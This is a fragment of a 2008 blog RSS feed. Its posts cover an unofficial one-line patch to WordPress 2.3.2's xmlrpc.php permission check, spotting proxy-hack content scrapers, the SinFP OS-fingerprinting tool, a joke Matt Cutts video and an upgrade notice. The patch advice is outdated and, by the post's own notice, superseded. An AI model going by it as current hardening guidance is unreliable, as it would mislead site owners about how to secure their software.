<p class="notice"><a href="http://blog.kakkoi.net/wordpress/wordpress-233-security-release/">WordPress 2.3.3</a> has been release it&#8217;s advice not to try this patches</p>
<h2>Patch xmlrpc.php via WordPress Admin</h2>
<ol class="xoxo">
<li> Login to Wordpress Admin</li>
<li class="cf"><a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/manage-files-xmlrpc.png' title='manage-files-xmlrpc.png' class="rr fr"><img src='http://blog.kakkoi.net/wp-content/uploads/2008/02/manage-files-xmlrpc.thumbnail.png' alt='manage-files-xmlrpc.png' width='128' height='64' longdesc='http://blog.kakkoi.net/wp-content/uploads/2008/02/manage-files-xmlrpc.png' /></a> Goto Manage &raquo; Files then scroll down to &#8220;Other Files&#8221; sections, type in <em>xmlrpc.php</em>. otherwise type the following URL in your browser address-bar &darr;
<pre>mydomain.com/wp-admin/templates.php?file=xmlrpc.php&#038;submit=Edit+file+%C2%BB</pre>
</li>
<li>Find the following code (around Line <a href="http://xref.redalt.com/wptrunk/xmlrpc.php.source.htm#l1151">1151</a> - 1203 ) within <a href="http://xref.redalt.com/wptrunk/xmlrpc.php.source.htm#1123" class="exturl icn-r">wp_xmlrpc_server::mw_editPost()</a> class methods &darr;
<pre>if ( ( 'post' == $post_type ) &#038;&#038; !current_user_can('edit_post', $post_ID) )</pre>
</li>
<li>Replace with
<pre class="prebox">
//if ( ( 'post' == $post_type ) &#038;&#038; !current_user_can('edit_post', $post_ID) )
 if ( ( 1 || 'post' == $post_type ) &#038;&#038; !current_user_can('edit_post', $post_ID) )
</pre>
<p>saved.
</li>
<li>Disabled New User Registrations for temporary.</li>
</ol>
<h2>External Links</h2>
<ul>
<li><a href="http://wordpress.org/support/topic/134928/" class="exturl icn-r">Wordpress Support Forum &rarr; iframe injection problem?</a></li>
<li><a href="http://www.securiteam.com/unixfocus/5HP010KNFK.html#ArticleTABLE" class="exturl icn-r">SecuriTeam &rarr; WordPress 2.3.2 XMLRPC Vulnerability <abbr title="proof of concept">POC</abbr></a>
<li><a href="http://en.wikipedia.org/wiki/XML-RPC" class="exturl icn-r">Wikipedia XML-RPC</a></li>
<li><a href="http://www.google.com/search?hl=en&amp;q=Wordpress+XML-RPC+Vulnerabilities" class="exturl icn-r">Google &rarr; Wordpress XML-RPC Vulnerabilities</a></li>
<li><a class="exturl icn-r" href="http://xref.redalt.com/wptrunk/xmlrpc.php.source.htm#l1151">PHPXREF wp-trunk xmlrpc source</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/wordpress-232-xmlrpc-exploit-unofficial-patch/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to track Google Proxy Hack Duplicate Contents</title>
		<link>http://42.kaizeku.com/tips/how-to-track-google-proxy-hack-duplicate-contents/</link>
		<comments>http://42.kaizeku.com/tips/how-to-track-google-proxy-hack-duplicate-contents/#comments</comments>
		<pubDate>Fri, 01 Feb 2008 06:29:10 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Blackhat]]></category>

		<category><![CDATA[Google Alerts]]></category>

		<category><![CDATA[Tips]]></category>

		<category><![CDATA[CopyScape]]></category>

		<category><![CDATA[Google]]></category>

		<category><![CDATA[google alerts]]></category>

		<category><![CDATA[google-bug]]></category>

		<category><![CDATA[proxy]]></category>

		<category><![CDATA[proxy hack]]></category>

		<category><![CDATA[webscrapper]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/tips/how-to-track-google-proxy-hack-duplicate-contents/</guid>
		<description><![CDATA[

I&#8217;m quite surprise to see my server logs todays, Some dude decide to scrap my blog content (including my wp translations cache 100mb+ ) 
The Offending uri:
http://www.shouker.com/user1/baiheinet/2008/1/16/80897.html
I&#8217;d blocked the site but it wont stop the search engine crawler from indexing the content .
This is nasty Blackhat SEO methods to get the target website penalize for [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img src='http://blog.kakkoi.net/wp-content/uploads/2007/12/marvin-apbot-costume-by-chaoskaizer.jpg' alt='Marvin Apbot costume by chaoskaizer' width="100" height="100" longdesc="http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2007/12/marvin-apbot-costume-by-chaoskaizer.jpg" />I&#8217;m quite surprise to see my server logs todays, Some dude decide to scrap my blog content (including my wp translations cache 100mb+ ) </p>
<pre>The Offending uri:
http://www.shouker.com/user1/baiheinet/2008/1/16/80897.html</pre>
<p>I&#8217;d blocked the site but it wont stop the search engine crawler from indexing the content .</p>
<p>This is nasty Blackhat SEO methods to get the target website penalize for duplicate content on Major Search Engine. There is few solution that i found at various resources &darr;.<br />
<span id="more-167"></span></p>
<ul>
<li>Report to Google, <dfn title="google proxy hack report">proxyreports@gmail.com</dfn> provide the url &#038; the google search query.</li>
<li>Block the Proxy Referrer IP</li>
<li>Add special no index meta for unknown search engine spiders.
<pre>&lt;META NAME=&quot;ROBOTS&quot; CONTENT=&quot;NOARCHIVE, NOINDEX, NOFOLLOW&quot;&gt;</pre>
</li>
</ul>
<h2>How to track Google Proxy Hacked Duplicate Contents</h2>
<ol>
<li>Monitor your content with <a class="exturl icn-r" href="http://www.google.com/alerts">Google Alerts</a> try used a unique <em>Search terms</em> for your website. i.e: blog.kakkoi, myname, myunique keywords, url http://blog.kakkoi.net, base64 safe uri encode.<br />
If you have a Google Webmaster Account go to <em>Statistics &raquo; What Googlebot sees</em> used the keywords as your Google Alerts search terms.
</li>
<li>Search for copies of your page on the Web <a href="http://www.copyscape.com/" class="exturl icn-r">copyscape</a></li>
</ol>
<h2>Whitelisting Search Engine Crawler</h2>
<p>IMO blocking the IP range of Proxy Server is not very practical. Having a Whitelist of Search Engine Crawler IP (class c) might do the trick. I&#8217;m working on a script for whitelisting search engine crawler for my wordpress. Hopefully i can finished it later this week. </p>
<h2>Google Algo bugs</h2>
<p><span class="vcard"><a href="http://www.seofaststart.com/" class="url fn microformat icn-l">Dan Thies</a></span> at seofaststart.com posts a details analysis regarding this issue, check out his post &rarr; <a class="exturl icn-r" href="http://www.seofaststart.com/blog/google-proxy-hacking">Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs</a>.</p>
<h2>Recent Update</h2>
<ul>
<li class="cf">Caught the proxy user just after I published this articles. Its human <em>117.8.222.77 / c-net 117.8.0.0/13</em> from Tianjin, China.<br />
<a href='http://blog.kakkoi.net/wp-content/uploads/2008/02/shouker-proxy.png' title='shouker-proxy.png' type="image/png"><img src='/wp-content/uploads/2008/02/shouker-proxy.thumbnail.png' alt='shouker.com proxy user' width='128' height='41' longdesc='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/02/shouker-proxy.png' /></a></li>
<li>The IP was graylisted on RBL &#038; cml.anti-spam.org.cn so we send a letter to abuse@cnc-noc.net</li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/tips/how-to-track-google-proxy-hack-duplicate-contents/feed/</wfw:commentRss>
		</item>
		<item>
		<title>SinFP Superb Remote OS detection via TCP/IP Stack FingerPrinting</title>
		<link>http://42.kaizeku.com/security/sinfp-superb-remote-os-detection-via-tcpip-stack-fingerprinting/</link>
		<comments>http://42.kaizeku.com/security/sinfp-superb-remote-os-detection-via-tcpip-stack-fingerprinting/#comments</comments>
		<pubDate>Sun, 06 Jan 2008 23:26:27 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Network Utilities]]></category>

		<category><![CDATA[Security]]></category>

		<category><![CDATA[fingerprint]]></category>

		<category><![CDATA[IDS]]></category>

		<category><![CDATA[Linux]]></category>

		<category><![CDATA[mac]]></category>

		<category><![CDATA[nettool]]></category>

		<category><![CDATA[networking]]></category>

		<category><![CDATA[portscan]]></category>

		<category><![CDATA[sysadmin]]></category>

		<category><![CDATA[tcpip]]></category>

		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/security/sinfp-superb-remote-os-detection-via-tcpip-stack-fingerprinting/</guid>
		<description><![CDATA[SinFP by Patrice AUffretGomor, is a full operating system TCP/IP stack fingerprinting. Features both Active (brute) and Passive Methods and support for IPV4 &#038; IPV6. It’s pretty damn fast and package with latest signature. It only send maximum of 3 standards packet to any open TCP port to get the results.]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><img class="thumb- fl" src='http://gmodules.com/ig/proxy?url=http://blog.kakkoi.net/wp-content/uploads/2008/01/aix-signature.png' alt='aix-signature SinFP OS Stack Fingeprinting ' width="255" height="44" /><span class="vcard"><strong class="note">SinFP</strong> by <cite><a class="microformat icn-l fn url" href="http://www.gomor.org/cgi-bin/index.pl?mode=view;page=cv"><span class="given-name">Patrice</span> <span class="family-name">AUffret</span></a><span class="nickname dn">Gomor</span></cite>,</span> is a full operating system TCP/IP stack <a href="http://en.wikipedia.org/wiki/TCP/IP_stack_fingerprinting" title="Wikipedia Articles on OS Stack Fingerprinting" class="exturl icn-r">fingerprinting</a>. Features both Active (brute) and Passive Methods and support for IPV4 &#038; IPV6. SinFP only send <cite>maximum of 3</cite> standards packet to any open TCP port to get the results. It&#8217;s damn fast and transparent (send valid <abbr title="Synchronize TCP Flag">SYN</abbr> &amp; options). </p>
<p>SinFP Online demo is available at <a class="exturl icn-r" href="http://www.gomor.org/cgi-bin/sinfp-demo.pl" title="Sinfp online Demo for IPV4 only">gomor.org sinfp demo</a>. You can <abbr title="download">grab</abbr> SinFP OS <strong class="fw-">Stack Fingerprinting</strong> package at CPAN or Gomor.org <small>(External Links &darr; )</small>.<br />
<span id="more-146"></span></p>
<p class="notice">SinFP package is available for Mac (PPC), Linux (included in BackTrack Linux distro) and Windows Binaries (ActivePerl).</p>
<h2 id="external-links">External Links</h2>
<ul>
<li><a href="http://search.cpan.org/~gomor/Net-SinFP-2.06/">Net-SinFP-2.06</a></li>
<li><a href="http://www.gomor.org/cgi-bin/sinfp.pl">SinFP Fingerprinting Overview at gomor.org</a></li>
<li><a href="http://search.cpan.org/~gomor/">All package by Gomor at CPAN</a></li>
<li><a href="http://sourceforge.net/projects/sinfp/">SinFP at SourceForge</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/security/sinfp-superb-remote-os-detection-via-tcpip-stack-fingerprinting/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Bribing Google&#8217;s Matt Cutts at Pubcon 2007</title>
		<link>http://42.kaizeku.com/google/bribing-googles-matt-cutts-at-pubcon-2007/</link>
		<comments>http://42.kaizeku.com/google/bribing-googles-matt-cutts-at-pubcon-2007/#comments</comments>
		<pubDate>Tue, 01 Jan 2008 02:50:31 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[Google]]></category>

		<category><![CDATA[YouTube]]></category>

		<category><![CDATA[matt+cutts]]></category>

		<category><![CDATA[pubcon-2007]]></category>

		<category><![CDATA[reachd]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/google/bribing-googles-matt-cutts-at-pubcon-2007/</guid>
		<description><![CDATA[

Google&#8217;s Matt Cutts caught on tape selling a 1st place link in Google Search for $500K. 
This is a &#8220;Just For Fun&#8221; 1 minutes video on bribing Matt Cutts at recent pubcon2007

YouTube Video

&#160;&#160;

This is what Matt Cuts&#8217;s has to say about getting 1st index in Google. 
No one can guarantee a #1 ranking — not [...]]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p><cite><span class="vcard"><img src='http://blog.kakkoi.net/wp-content/uploads/2008/01/matt-cutts.png' class="photo" alt='matt cutts' /><span class="org">Google</span>&#8217;s <a href="http://www.mattcutts.com" class="url fn"><span class="given-name">Matt</span> <span class="family-name">Cutts</span></a></span> caught on tape selling a 1st place link in Google Search for $500K. </cite></p>
<p>This is a &#8220;Just For Fun&#8221; 1 minutes video on bribing <em class="vcard"><a href="http://www.mattcutts.com/blog/tons-of-pubcon-interviews-on-video-and-audio/" class="url fn" ><span class="given-ma,e">Matt</span> <span class="family-name">Cutts</span></a></em> at recent <a href="http://www.pubcon.com">pubcon2007</a></p>
<p><span id="more-120"></span></p>
<h2 class="cb">YouTube Video</h2>
<div id="youtube-ff" class="cb" style="width:425px;height:380px;overflow:hidden;margin:18px auto">
<object width="425" height="355"><param name="movie" value="http://www.youtube.com/v/vjYQ-ev3DKE&#038;rel=1">&nbsp;</param><param name="wmode" value="transparent">&nbsp;</param><embed src="http://www.youtube.com/v/vjYQ-ev3DKE&#038;rel=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"></embed></object>
</div>
<p>This is what Matt Cuts&#8217;s has to say about getting 1st index in Google. </p>
<blockquote cite="http://www.mattcutts.com/blog/tons-of-pubcon-interviews-on-video-and-audio/#post-845"><p class="desc">No one can guarantee a #1 ranking — not even me</p>
</blockquote>
<h2>External Links</h2>
<ul class="xoxo">
<li><a href="http://www.mattcutts.com/blog/tons-of-pubcon-interviews-on-video-and-audio/">Matt Cutts &rarr; Tons of PubCon interviews on video and audio</a></li>
<li><a href="http://www.reachd.com/ViewBlog/115/">ReachTV &rarr; Interview with Matt Cutts from Google at Pubcon</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/google/bribing-googles-matt-cutts-at-pubcon-2007/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Upgrade Wordpress 2.3.2</title>
		<link>http://42.kaizeku.com/wordpress/upgrade-wordpress-232/</link>
		<comments>http://42.kaizeku.com/wordpress/upgrade-wordpress-232/#comments</comments>
		<pubDate>Sun, 30 Dec 2007 11:36:40 +0000</pubDate>
		<dc:creator>Noah Ark</dc:creator>
		
		<category><![CDATA[WordPress]]></category>

		<category><![CDATA[vulnerability]]></category>

		<category><![CDATA[2.3.2]]></category>

		<guid isPermaLink="false">http://blog.kakkoi.net/wordpress/upgrade-wordpress-232/</guid>
		<description><![CDATA[WordPress developer had to release this 'securities' fixes before the upcoming 2.4. You could either wait for 2.4 (the milestone is almost ready?) or upgrade immediately. But before others exploit this vulnerability its better to upgrade than sorry. ]]></description>
			<content:encoded><![CDATA[
<!-- google_ad_section_start -->
<p>I just upgrade today, <a href="http://wordpress.org/download/">WordPress 2.3.2</a>, fixed a <a href="http://trac.wordpress.org/ticket/5487">nasty vulnerability</a>. I haven&#8217;t did any test yet but according to &#8220;<a href="http://blog.kakkoi.net/wordpress/upgrade-wordpress-232/#black-domainer">blackhat domainer</a>&#8221; you can view WordPress Draft Entry via simple URL parameters without log in (un-authorize view).<br />
<span id="more-119"></span><br />
WordPress developer had to release this &#8217;securities&#8217; fixes before the upcoming 2.4. You could either wait for 2.4 (the milestone is almost ready?) or upgrade immediately. But before others exploit this vulnerability its better to upgrade. </p>
<p>Peter Westwood&#8217;s sum up all wordpress 2.3.2 recent <a href="http://westi.wordpress.com/2007/12/30/wordpress-232-in-detail/">change and update in details</a>. Read it first before you decide to upgrade.</p>
<h2>External Links</h2>
<ul>
<li><a id="black-domainer" class="url" href="http://www.blackhatdomainer.com/how-to-know-today-what-shoemoney-is-going-to-post-tomorrow/" rel="external">How to know today what ShoeMoney is going to post tomorrow</a></li>
<li><a href="http://wordpress.org/development/2007/12/wordpress-232/">Wordpress 2.3.2 Announcements (dev blog)</a></li>
</ul>
<!-- google_ad_section_end -->
]]></content:encoded>
			<wfw:commentRss>http://42.kaizeku.com/wordpress/upgrade-wordpress-232/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
